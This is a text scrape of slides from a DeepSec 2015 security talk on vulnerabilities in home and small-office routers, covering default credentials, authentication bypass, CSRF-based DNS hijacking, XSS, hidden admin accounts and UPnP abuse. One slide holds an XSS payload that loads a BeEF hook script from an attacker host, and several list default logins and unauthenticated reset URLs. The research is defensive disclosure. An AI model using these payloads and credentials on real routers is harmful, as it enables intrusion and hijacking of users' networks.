revisiting soho router
play

Revisiting SOHO Router Attacks DeepSec 2015 About us.. ... Meet - PowerPoint PPT Presentation

Revisiting SOHO Router Attacks DeepSec 2015 About us.. ... Meet our research group lvaro Folgado Rueda Independent Researcher Jos Antonio Rodrguez Garca Independent Researcher Ivn Sanz de Castro Security Analyst at Wise Security


  1. Revisiting SOHO Router Attacks DeepSec 2015

  2. About us.. ... Meet our research group Álvaro Folgado Rueda Independent Researcher José Antonio Rodríguez García Independent Researcher Iván Sanz de Castro Security Analyst at Wise Security Global . Revisiting SOHO Router Attacks · DeepSec 2015 2

  3. Main goals Search for Explore innovative vulnerability issues attack vectors Evaluate the current security level of routers Develop exploiting Build an audit tools methodology Revisiting SOHO Router Attacks · DeepSec 2015 3

  4. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  5. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  6. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  7. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  8. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  9. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  10. State of the art • Real world attacks Revisiting SOHO Router Attacks · DeepSec 2015 5

  11. Common security problems • Services • Too many. Mostly useless. • Increases attack surfaces • Insecure Revisiting SOHO Router Attacks · DeepSec 2015 6

  12. Common security problems • Default credentials • Public and well-known for each model • Non randomly generated • Hardly ever modified by users Use ser / / Pas assword 18% 1234 / 1234 5% admin / admin 45% 5% [blank] / admin admin / password 27% vodafone / vodafone Revisiting SOHO Router Attacks · DeepSec 2015 7

  13. Common security problems • Multiple user accounts • Also with public default credentials • Mostly useless for users • Almost always hidden for end-users • Passwords for these accounts are never changed Revisiting SOHO Router Attacks · DeepSec 2015 8

  14. Common security problems • Multiple user accounts • Also with public default credentials • Mostly useless for users • Almost always hidden for end-users • Passwords for these accounts are never changed Revisiting SOHO Router Attacks · DeepSec 2015 8

  15. Bypass Authentication • Allows unauthenticated attackers to carry out router configuration changes • Locally and remotely • Exploits: • Improper file permissions • Service misconfiguration Revisiting SOHO Router Attacks · DeepSec 2015 9

  16. Bypass Authentication • Web configuration interface • Permanent Denial of Service • By accessing /rebootinfo.cgi • Reset to default configuration settings • By accessing /restoreinfo.cgi • Router replies with either HTTP 400 (Bad Request) or HTTP 401 (Unauthorized) • But spamming gets the job done! Vid ideo Demo #1 • Persistent Denial of Service without requiring authentication Revisiting SOHO Router Attacks · DeepSec 2015 10

  17. Bypass Authentication • SMB • Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd • File modification is as well possible • Erroneous configuration of the wide links feature Revisiting SOHO Router Attacks · DeepSec 2015 11

  18. Bypass Authentication • SMB • Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd • File modification is as well possible • Erroneous configuration of the wide links feature Revisiting SOHO Router Attacks · DeepSec 2015 11

  19. Bypass Authentication • Twonky Media Server • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files. • Misconfiguration of the service Revisiting SOHO Router Attacks · DeepSec 2015 12

  20. Bypass Authentication • Twonky Media Server • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files. • Misconfiguration of the service Revisiting SOHO Router Attacks · DeepSec 2015 12

  21. Cross Site Request Forgery ry • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Revisiting SOHO Router Attacks · DeepSec 2015 13

  22. Cross Site Request Forgery ry • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Revisiting SOHO Router Attacks · DeepSec 2015 13

  23. Cross Site Request Forgery ry • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Revisiting SOHO Router Attacks · DeepSec 2015 13

  24. Cross Site Request Forgery ry • Suspicious link, isn't it? • URL Shortening Services • Create a malicious website Revisiting SOHO Router Attacks · DeepSec 2015 14

  25. Persistent Cross Site Scripting • Inject malicious script code within the web configuration interface • Goals • Session Hijacking • Browser Infection Revisiting SOHO Router Attacks · DeepSec 2015 15

  26. Persistent Cross Site Scripting • Browser Exploitation Framework is a great help • Input field character length limitation • BeEF hooks link to a more complex script file hosted by the attacker http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script> Revisiting SOHO Router Attacks · DeepSec 2015 16

  27. Unauthenticated Cross Site Scripting • Script code injection is performed locally without requiring any login process • Send a DHCP Request PDU containing the malicious script within the hostname parameter • The malicious script is injected within Connected Clients (DHCP Leases) table Revisiting SOHO Router Attacks · DeepSec 2015 17

  28. Unauthenticated Cross Site Scripting Revisiting SOHO Router Attacks · DeepSec 2015 18

  29. Unauthenticated Cross Site Scripting • Sometimes it is a little bit harder... Revisiting SOHO Router Attacks · DeepSec 2015 19

  30. Unauthenticated Cross Site Scripting • Sometimes it is a little bit harder... Revisiting SOHO Router Attacks · DeepSec 2015 19

  31. Unauthenticated Cross Site Scripting • Or even next level... • But it works! Revisiting SOHO Router Attacks · DeepSec 2015 20

  32. Privilege Escalation • User without administrator rights is able to escalate privileges and become an administrator • Shows why multiple user accounts are unsafe Vid ideo Demo #2 • Privilege Escalation via FTP Revisiting SOHO Router Attacks · DeepSec 2015 21

  33. Backdoor • Hidden administrator accounts • Completely invisible to end users • But allows attackers to change any configuration setting Revisiting SOHO Router Attacks · DeepSec 2015 22

  34. Backdoor • Hidden administrator accounts • Completely invisible to end users • But allows attackers to change any configuration setting Revisiting SOHO Router Attacks · DeepSec 2015 22

  35. In Information Disclosure • Obtain critical information without requiring any login process • WLAN password • Detailed list of currently connected clients • Hints about router's administrative password • Other critical configuration settings Revisiting SOHO Router Attacks · DeepSec 2015 23

  36. In Information Disclosure • Obtain critical information without requiring any login process • WLAN password • Detailed list of currently connected clients • Hints about router's administrative password • Other critical configuration settings Revisiting SOHO Router Attacks · DeepSec 2015 23

  37. Information Disclosure In Revisiting SOHO Router Attacks · DeepSec 2015 24

  38. Information Disclosure In Revisiting SOHO Router Attacks · DeepSec 2015 24

  39. Information Disclosure In Revisiting SOHO Router Attacks · DeepSec 2015 24

  40. Universal Plug and Play • Enabled by default on several router models • Allows application to execute network configuration changes such as opening ports • Extremely insecure protocol • Lack of an authentication process • Awful implementations • Goals • Open critical ports for remote WAN hosts • Persistent Denial of Service • Carry out other configuration changes Revisiting SOHO Router Attacks · DeepSec 2015 25

  41. Universal Plug and Play • Locally • Miranda UPnP tool Revisiting SOHO Router Attacks · DeepSec 2015 26

  42. Universal Plug and Play Revisiting SOHO Router Attacks · DeepSec 2015 27

  43. Universal Plug and Play Revisiting SOHO Router Attacks · DeepSec 2015 27

  44. Universal Plug and Play • Remotely • Malicious SWF file Revisiting SOHO Router Attacks · DeepSec 2015 28

Recommend


More recommend